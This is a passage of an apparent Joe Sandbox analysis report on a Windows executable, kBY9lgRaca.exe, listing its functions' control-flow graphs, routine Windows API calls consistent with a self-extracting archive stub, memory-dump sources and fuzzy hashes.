                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1414292761-0
                                                                  • Opcode ID: 4be246429006937c8043e1dd329e9ff3f7727f8be7e7ec6c66ddcc79c60cbaac
                                                                  • Instruction ID: e28099a62083668e97c8b392cc00d1ab4d0d2c44b8f97658a54add2957e2f89b
                                                                  • Opcode Fuzzy Hash: 4be246429006937c8043e1dd329e9ff3f7727f8be7e7ec6c66ddcc79c60cbaac
                                                                  • Instruction Fuzzy Hash: 5151CF72600216BFDB258F64CC81EAFB7AAEB44710B15462FFE14D6240EB74DD41D6A2

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 975 cd3b72-cd3b7c 976 cd3bee-cd3bf1 975->976 977 cd3b7e-cd3b8c 976->977 978 cd3bf3 976->978 980 cd3b8e-cd3b91 977->980 981 cd3b95-cd3bb1 LoadLibraryExW 977->981 979 cd3bf5-cd3bf9 978->979 982 cd3c09-cd3c0b 980->982 983 cd3b93 980->983 984 cd3bfa-cd3c00 981->984 985 cd3bb3-cd3bbc GetLastError 981->985 982->979 987 cd3beb 983->987 984->982 986 cd3c02-cd3c03 FreeLibrary 984->986 988 cd3bbe-cd3bd3 call cd6088 985->988 989 cd3be6-cd3be9 985->989 986->982 987->976 988->989 992 cd3bd5-cd3be4 LoadLibraryExW 988->992 989->987 992->984 992->989
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00CD3C35,00000000,00000FA0,00D12088,00000000,?,00CD3D60,00000004,InitializeCriticalSectionEx,00CE6394,InitializeCriticalSectionEx,00000000), ref: 00CD3C03
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID: api-ms-
                                                                  • API String ID: 3664257935-2084034818
                                                                  • Opcode ID: 646d024d3785750638fb3badd4fde70b838e8fc9f05d7f1feed90358ef574991
                                                                  • Instruction ID: 37f100016f4a0aa6ff1c0481af33d6ec341775f6eab35a1f014e9cb8203ba986
                                                                  • Opcode Fuzzy Hash: 646d024d3785750638fb3badd4fde70b838e8fc9f05d7f1feed90358ef574991
                                                                  • Instruction Fuzzy Hash: E711A731A452A1BBCB218B699C8575D77A49F01770F150213EA25FB3D0D775EF008AD2

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 993 cb98e0-cb9901 call ccec50 996 cb990c 993->996 997 cb9903-cb9906 993->997 999 cb990e-cb991f 996->999 997->996 998 cb9908-cb990a 997->998 998->999 1000 cb9921 999->1000 1001 cb9927-cb9931 999->1001 1000->1001 1002 cb9933 1001->1002 1003 cb9936-cb9943 call cb6edb 1001->1003 1002->1003 1006 cb994b-cb996a CreateFileW 1003->1006 1007 cb9945 1003->1007 1008 cb99bb-cb99bf 1006->1008 1009 cb996c-cb998e GetLastError call cbbb03 1006->1009 1007->1006 1011 cb99c3-cb99c6 1008->1011 1014 cb99c8-cb99cd 1009->1014 1015 cb9990-cb99b3 CreateFileW GetLastError 1009->1015 1013 cb99d9-cb99de 1011->1013 1011->1014 1017 cb99ff-cb9a10 1013->1017 1018 cb99e0-cb99e3 1013->1018 1014->1013 1016 cb99cf 1014->1016 1015->1011 1019 cb99b5-cb99b9 1015->1019 1016->1013 1021 cb9a2e-cb9a39 1017->1021 1022 cb9a12-cb9a2a call cc0602 1017->1022 1018->1017 1020 cb99e5-cb99f9 SetFileTime 1018->1020 1019->1011 1020->1017 1022->1021
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00CB7760,?,00000005,?,00000011), ref: 00CB995F
                                                                  • GetLastError.KERNEL32(?,?,00CB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CB996C
                                                                  • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00CB7760,?,00000005,?), ref: 00CB99A2
                                                                  • GetLastError.KERNEL32(?,?,00CB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CB99AA
                                                                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00CB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CB99F9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: File$CreateErrorLast$Time
                                                                  • String ID:
                                                                  • API String ID: 1999340476-0
                                                                  • Opcode ID: 7a9e4dcca5db660e7a63cf0955f5c876819eb253fb4676b02e81b01cd9a4adbb
                                                                  • Instruction ID: 78595d08d165df0cfcfa1a557df207d29d05bb58079647a2ca50fe03c2cb0ecf
                                                                  • Opcode Fuzzy Hash: 7a9e4dcca5db660e7a63cf0955f5c876819eb253fb4676b02e81b01cd9a4adbb
                                                                  • Instruction Fuzzy Hash: 1B311730944785AFE7309F24CC85BDABB98FB05320F200B1DFAB5961D1D7B5AA44CB95

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1052 ccb568-ccb581 PeekMessageW 1053 ccb5bc-ccb5be 1052->1053 1054 ccb583-ccb597 GetMessageW 1052->1054 1055 ccb5a8-ccb5b6 TranslateMessage DispatchMessageW 1054->1055 1056 ccb599-ccb5a6 IsDialogMessageW 1054->1056 1055->1053 1056->1053 1056->1055
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CCB579
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CCB58A
                                                                  • IsDialogMessageW.USER32(00010410,?), ref: 00CCB59E
                                                                  • TranslateMessage.USER32(?), ref: 00CCB5AC
                                                                  • DispatchMessageW.USER32(?), ref: 00CCB5B6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                                  • String ID:
                                                                  • API String ID: 1266772231-0
                                                                  • Opcode ID: 4b2312fea4192416a317b56b6308bdc598c32c1323438593424faab902585fd3
                                                                  • Instruction ID: ae3cb8ffc100f17a3bf01ce6f1f662452596914603ff03509258545683107c7e
                                                                  • Opcode Fuzzy Hash: 4b2312fea4192416a317b56b6308bdc598c32c1323438593424faab902585fd3
                                                                  • Instruction Fuzzy Hash: 75F06D71A0121ABB8B209FE5DC4DEEB7FACEE056917408415B519D2150EF74D646CBB0

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1057 cd7f6e-cd7f7b 1058 cd7f7d-cd7f81 1057->1058 1059 cd7f99-cd7fc2 call cdbb30 GetModuleFileNameA 1057->1059 1058->1059 1060 cd7f83-cd7f94 call cd91a8 call cd9087 1058->1060 1065 cd7fc9 1059->1065 1066 cd7fc4-cd7fc7 1059->1066 1071 cd808d-cd8091 1060->1071 1068 cd7fcb-cd7ff5 call cd8092 call cd8207 1065->1068 1066->1065 1066->1068 1075 cd7ff7-cd8001 call cd91a8 1068->1075 1076 cd8003-cd8020 call cd8092 1068->1076 1081 cd8034-cd8036 1075->1081 1082 cd8038-cd804b call cdb643 1076->1082 1083 cd8022-cd802f 1076->1083 1084 cd8082-cd808c call cd8dcc 1081->1084 1089 cd804d-cd8050 1082->1089 1090 cd8052-cd805b 1082->1090 1083->1081 1084->1071 1091 cd8078-cd807f call cd8dcc 1089->1091 1092 cd805d-cd8063 1090->1092 1093 cd8065-cd8072 1090->1093 1091->1084 1092->1092 1092->1093 1093->1091
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\kBY9lgRaca.exe,00000104), ref: 00CD7FAE
                                                                  • _free.LIBCMT ref: 00CD8079
                                                                  • _free.LIBCMT ref: 00CD8083
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: _free$FileModuleName
                                                                  • String ID: C:\Users\user\Desktop\kBY9lgRaca.exe
                                                                  • API String ID: 2506810119-1399711687
                                                                  • Opcode ID: 6429bd147fcd4ca86e15d4233155c12fbe0c27b425d2da2910e6af1040fff119
                                                                  • Instruction ID: 9da121a32d4a7e8959ec5c14e1040aefebede67ade54952a7a7ce7fcefa43d0a
                                                                  • Opcode Fuzzy Hash: 6429bd147fcd4ca86e15d4233155c12fbe0c27b425d2da2910e6af1040fff119
                                                                  • Instruction Fuzzy Hash: BA31A071A00208BFCB21EF95D8809AEBBBCEF84310F10416BF60497351DB719E49DB61

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1096 ccabab-ccabca GetClassNameW 1097 ccabcc-ccabe1 call cc1fbb 1096->1097 1098 ccabf2-ccabf4 1096->1098 1103 ccabf1 1097->1103 1104 ccabe3-ccabef FindWindowExW 1097->1104 1100 ccabff-ccac01 1098->1100 1101 ccabf6-ccabf9 SHAutoComplete 1098->1101 1101->1100 1103->1098 1104->1103
                                                                  APIs
                                                                  • GetClassNameW.USER32(?,?,00000050), ref: 00CCABC2
                                                                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 00CCABF9
                                                                    • Part of subcall function 00CC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CBC116,00000000,.exe,?,?,00000800,?,?,?,00CC8E3C), ref: 00CC1FD1
                                                                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00CCABE9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                  • String ID: EDIT
                                                                  • API String ID: 4243998846-3080729518
                                                                  • Opcode ID: 1d79c8c375eb14b9e581170cae8355395e8a5c5425fdaaedd98a8ed368cd6079
                                                                  • Instruction ID: fc58f2223e46dda0edb5187cb9a3a62d1e420ac736c976d51d170c4bc64a7764
                                                                  • Opcode Fuzzy Hash: 1d79c8c375eb14b9e581170cae8355395e8a5c5425fdaaedd98a8ed368cd6079
                                                                  • Instruction Fuzzy Hash: 43F0823660072877DB209A659C09FDB76AC9B4AB40F484029FA05E2180DB60DF4286B6

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00CC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CC0836
                                                                    • Part of subcall function 00CC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CBF2D8,Crypt32.dll,00000000,00CBF35C,?,?,00CBF33E,?,?,?), ref: 00CC0858
                                                                  • OleInitialize.OLE32(00000000), ref: 00CCAC2F
                                                                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CCAC66
                                                                  • SHGetMalloc.SHELL32(00CF8438), ref: 00CCAC70
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                  • String ID: riched20.dll
                                                                  • API String ID: 3498096277-3360196438
                                                                  • Opcode ID: c0abbc9d6fff0285a2190b9a72c9cec7c7518c19e5f7f4053229c284af038097
                                                                  • Instruction ID: 0d066694a3c8570a9bd4fb0b0fb46c26a6ac644585dc8f7663dc15732038805b
                                                                  • Opcode Fuzzy Hash: c0abbc9d6fff0285a2190b9a72c9cec7c7518c19e5f7f4053229c284af038097
                                                                  • Instruction Fuzzy Hash: 25F0FFB5900209ABCB10AFA9D8499EFFFFCEF94700F10415AE515E2251DBB456468FA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1109 ccdbde-ccdc09 call ccec50 SetEnvironmentVariableW call cc0371 1113 ccdc0e-ccdc12 1109->1113 1114 ccdc14-ccdc18 1113->1114 1115 ccdc36-ccdc38 1113->1115 1116 ccdc21-ccdc28 call cc048d 1114->1116 1119 ccdc1a-ccdc20 1116->1119 1120 ccdc2a-ccdc30 SetEnvironmentVariableW 1116->1120 1119->1116 1120->1115
                                                                  APIs
                                                                  • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CCDBF4
                                                                  • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CCDC30
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentVariable
                                                                  • String ID: sfxcmd$sfxpar
                                                                  • API String ID: 1431749950-3493335439
                                                                  • Opcode ID: f83afcec8e85ec426bff69d117a9d9c2e5f918c64bc0b4a3c087d1c17fec3b58
                                                                  • Instruction ID: 0f9d0dc8e1b0901b5b60dc4e333167b126af510fa61bf88491a3b317ec53a765
                                                                  • Opcode Fuzzy Hash: f83afcec8e85ec426bff69d117a9d9c2e5f918c64bc0b4a3c087d1c17fec3b58
                                                                  • Instruction Fuzzy Hash: 16F0E5B2505264EBCB202F95CC4AFFF3B58BF04B82B04046DFD87DA051E6B09940E6B0
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00CB9795
                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00CB97AD
                                                                  • GetLastError.KERNEL32 ref: 00CB97DF
                                                                  • GetLastError.KERNEL32 ref: 00CB97FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FileHandleRead
                                                                  • String ID:
                                                                  • API String ID: 2244327787-0
                                                                  • Opcode ID: 3e60efad86c5969a08ca050e69491d2f1cfe6c9f8b910b0d0b2872e9dd03a0e1
                                                                  • Instruction ID: 8d8f46f3025e5f4c9a2f454494cc6d337d41c47e2303ec22ed8ce113933a889e
                                                                  • Opcode Fuzzy Hash: 3e60efad86c5969a08ca050e69491d2f1cfe6c9f8b910b0d0b2872e9dd03a0e1
                                                                  • Instruction Fuzzy Hash: 8611AC30910614EBCF209F65C844AED3BF9FB06320F10892AE62A961D0DB769F44DB61
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00CD40EF,00000000,00000000,?,00CDACDB,00CD40EF,00000000,00000000,00000000,?,00CDAED8,00000006,FlsSetValue), ref: 00CDAD66
                                                                  • GetLastError.KERNEL32(?,00CDACDB,00CD40EF,00000000,00000000,00000000,?,00CDAED8,00000006,FlsSetValue,00CE7970,FlsSetValue,00000000,00000364,?,00CD98B7), ref: 00CDAD72
                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00CDACDB,00CD40EF,00000000,00000000,00000000,?,00CDAED8,00000006,FlsSetValue,00CE7970,FlsSetValue,00000000), ref: 00CDAD80
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 3177248105-0
                                                                  • Opcode ID: d1b279bb70a4f612eec14f3c5fb07122a848b0f9ae94c3a25b7ddb7ca3147e73
                                                                  • Instruction ID: 6a08bff3ef680bb54a1505735c1079f1abcdc9de97a75e6833d4c4d9d4f5a8f8
                                                                  • Opcode Fuzzy Hash: d1b279bb70a4f612eec14f3c5fb07122a848b0f9ae94c3a25b7ddb7ca3147e73
                                                                  • Instruction Fuzzy Hash: 9C014C32201262ABC7214E799C88B5B7B59EF01B627100621FA16D7750C720D901CAE1
                                                                  APIs
                                                                  • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00CC1043
                                                                  • SetThreadPriority.KERNEL32(?,00000000), ref: 00CC108A
                                                                    • Part of subcall function 00CB6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB6C54
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                  • String ID: CreateThread failed
                                                                  • API String ID: 2655393344-3849766595
                                                                  • Opcode ID: 8a8f822a1b7036ea4c2ad24856465f9b21951d2d6b4e8614788d6c6b9d9815a6
                                                                  • Instruction ID: 65f79ac6508e9b4ea56f3c9ff7465b733d589edc85f76e5051e4a4d2ad4792a8
                                                                  • Opcode Fuzzy Hash: 8a8f822a1b7036ea4c2ad24856465f9b21951d2d6b4e8614788d6c6b9d9815a6
                                                                  • Instruction Fuzzy Hash: A70149B5300349AFD3306F25EC81FBA7398EB41351F24003EFE8257281CEA1B8858720
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00CBD343,00000001,?,?,?,00000000,00CC551D,?,?,?), ref: 00CB9F9E
                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00CC551D,?,?,?,?,?,00CC4FC7,?), ref: 00CB9FE5
                                                                  • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00CBD343,00000001,?,?), ref: 00CBA011
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite$Handle
                                                                  • String ID:
                                                                  • API String ID: 4209713984-0
                                                                  • Opcode ID: c21334005c57f65daba922d0f80818aabbc67128a0e42fc6030c626639d749b6
                                                                  • Instruction ID: af1c192c11a049a78426989e5763aeb4d0b80b1fef791a5a31fa87cd32eafc63
                                                                  • Opcode Fuzzy Hash: c21334005c57f65daba922d0f80818aabbc67128a0e42fc6030c626639d749b6
                                                                  • Instruction Fuzzy Hash: 0D31C431204345AFDB14DF24E848BBE77A5FF84721F04451DF9929B290CB75AE48CBA2
                                                                  APIs
                                                                    • Part of subcall function 00CBC27E: _wcslen.LIBCMT ref: 00CBC284
                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00CBA175,?,00000001,00000000,?,?), ref: 00CBA2D9
                                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00CBA175,?,00000001,00000000,?,?), ref: 00CBA30C
                                                                  • GetLastError.KERNEL32(?,?,?,?,00CBA175,?,00000001,00000000,?,?), ref: 00CBA329
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectory$ErrorLast_wcslen
                                                                  • String ID:
                                                                  • API String ID: 2260680371-0
                                                                  • Opcode ID: 7440ac16018d7a3083b6345e55f489a462a5d9620fc2ade2d62826fa2c846f2a
